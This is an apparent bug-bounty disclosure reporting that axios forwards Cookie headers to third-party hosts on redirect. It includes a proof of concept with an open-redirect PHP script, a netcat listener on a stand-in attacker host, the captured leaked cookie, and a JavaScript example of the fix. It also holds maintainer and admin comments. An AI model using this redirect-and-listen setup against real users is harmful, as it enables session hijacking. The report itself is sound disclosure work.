Exposure of Sensitive Information to an Unauthorized Actor in axios/axios

Valid

Reported on

Jan 5th 2022


BUG

Cookie header leaked to a third-party site, allowing the victim's account to be hijacked

SUMMARY

When axios fetches a remote URL with a Cookie header and the response carries a Location header, it follows the redirect and requests the new URL with the same Cookie header. The cookie is therefore leaked to a third party.
Example: you fetch example.com with a cookie; if example.com redirects to attacker.com, axios requests the redirect target with the cookie you supplied.
So the cookie for example.com is leaked to attacker.com.
Cookies are the standard way to authenticate to a web app and must not be sent to other sites.
Browsers scope a cookie to the host that set it, so when a browser follows the same redirect it does not send example.com's cookie to attacker.com.

FLOW

If you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ the server redirects you to http://attacker.com:8182/ .

First set up a web server hosting redirect.php and a netcat listener.

http://mysite.com/redirect.php?url=http://attacker.com:8182/

//redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");

/* Make sure that code below does not get executed when we redirect. */
exit;
?>

netcat listener on attacker.com:

nc -lnvp 8182

STEPS TO REPRODUCE

Run the axios code below:

const axios = require('axios');

// Request mysite.com with a Cookie header; the server answers with a Location
// header pointing at attacker.com, and axios follows it with the same headers
axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',{headers:{"Cookie":"dfdd=df"}})
  .then(function (response) {
    // handle success
    console.log(response);
  })
  .catch(function (error) {
    // handle error
    console.log(error);
  })
  .then(function () {
    // always executed
  });

Request received by the attacker's netcat listener (the listener here was run locally, hence 127.0.0.1 and localhost in the capture):

Connection from 127.0.0.1 36724 received!
GET /yy HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: dfdd=df
User-Agent: axios/0.24.0
Host: localhost:8182
Connection: close

So the cookie I supplied for mysite.com was leaked to the third-party site attacker.com because of the redirect.

SUGGESTED FIX

If the domain of the requested URL and the domain of the redirect target are the same, sending the Cookie/Authorization headers along with the redirected request is acceptable. If the two domains differ, the redirect goes to a third-party site, so the Cookie/Authorization headers must not be sent.
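One way to implement this check, written in JavaScript as an added example (it is not axios's or follow-redirects' own code; the function names, the constructed responder and the sample headers are assumptions for illustration):

```javascript
// Added example, not code from axios or follow-redirects. It shows the
// suggested fix as a pure function: credential-bearing headers are dropped
// whenever a redirect leaves the host of the request that carried them.
// The function names, the constructed responder and the sample headers are
// assumptions made for this illustration.

// Headers that carry credentials for the current host and must not travel
// to another one (the report names Cookie and Authorization).
const SENSITIVE_HEADERS = /^(?:authorization|cookie)$/i;

// Compute the URL and headers for the redirected request. A relative
// Location ("/login") resolves on the current origin; an absolute one may
// point anywhere. `host` includes the explicit port, so
// mysite.com -> attacker.com:8182 and mysite.com -> mysite.com:8182 both
// count as a change of host. Subdomains are deliberately treated as
// different hosts: api.example.com's session cookie is not replayed to a
// sibling host unless the caller decides that is safe.
function headersForRedirect(currentUrl, location, headers) {
  const next = new URL(location, currentUrl);
  const sameHost = new URL(currentUrl).host === next.host;
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!sameHost && SENSITIVE_HEADERS.test(name)) {
      continue; // would leak the current host's credential to a third party
    }
    out[name] = value;
  }
  return { url: next.href, headers: out };
}

// Follow a redirect chain without touching the network. `responder` is a
// stand-in for the servers, returning { status, location } for a URL. Every
// request that would hit the wire is recorded in `sent` so the caller can
// check exactly which headers reached which host.
function followRedirects(startUrl, headers, responder, maxRedirects = 5) {
  let url = startUrl;
  let hdrs = { ...headers };
  const sent = [];
  for (let hop = 0; hop <= maxRedirects; hop++) {
    sent.push({ url, headers: { ...hdrs } });
    const res = responder(url);
    if (res.status < 300 || res.status > 399 || !res.location) {
      return { finalUrl: url, sent };
    }
    ({ url, headers: hdrs } = headersForRedirect(url, res.location, hdrs));
  }
  throw new Error('too many redirects');
}

// Constructed responder reproducing the report: redirect.php on mysite.com
// sends the client to whatever ?url= says; everything else answers 200.
function reportScenario(url) {
  if (url.startsWith('http://mysite.com/redirect.php')) {
    return { status: 302, location: new URL(url).searchParams.get('url') };
  }
  return { status: 200 };
}

// Replay the report's request and print what each host would have received.
function demo() {
  const run = followRedirects(
    'http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',
    { Cookie: 'dfdd=df', Accept: 'application/json, text/plain, */*' },
    reportScenario
  );
  for (const hop of run.sent) {
    console.log(hop.url, JSON.stringify(hop.headers));
  }
  return run;
}

demo();
```

In the replayed scenario the first hop to mysite.com carries `Cookie: dfdd=df`, while the hop to attacker.com:8182 keeps `Accept` but no longer has the cookie. The same rule covers `Authorization`, as the suggested fix asks. Comparing `host` rather than the bare hostname means a port change also strips credentials, and subdomains are not treated as the same site; a stricter policy would additionally drop credentials when the scheme downgrades from https to http, so that a cookie or bearer token is never replayed in cleartext.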

We are processing your report and will contact the axios team within 24 hours. 5 months ago
We have contacted a member of the axios team and are waiting to hear back 5 months ago
We have sent a follow up to the axios team. We will try again in 7 days. 5 months ago
Jay
5 months ago

Maintainer


Thanks, I can see how this would be an issue. I will get back to you soon with a fix.

ranjit-git
5 months ago

Researcher


Thanks for the reply. Here is another similar report https://huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406/ for another repo. The maintainer fixed this bug by checking whether the current domain and the redirected domain match.
If the current URL's domain is the same as the redirected URL's domain, there is no problem. But if the current domain and the redirect domain are different, the cookie of the current domain does not need to be sent to the redirect domain, which prevents this cookie leak.

ranjit-git modified the report
5 months ago
ranjit-git
4 months ago

Researcher


Hi, I just saw that axios uses follow-redirects, which was vulnerable to this attack. https://github.com/follow-redirects/follow-redirects/issues/183#issuecomment-1012265743
https://github.com/axios/axios/issues/4378

We have sent a second follow up to the axios team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the axios team. This report is now considered stale. 4 months ago
ranjit-git
2 months ago

Researcher


Any update?

Jay validated this vulnerability 2 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the axios team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the axios team. We will try again in 10 days. a month ago
We have sent a third and final fix follow up to the axios team. This report is now considered stale. a month ago
Pavlos Moros
a month ago

Admin


@maintainer could you please mark this vulnerability as fixed? :)

Jay confirmed that a fix has been merged on c9aca7 a month ago
The fix bounty has been dropped
Jamie Slome
24 days ago

Admin


The CVE has been revoked here due to the following discussion.
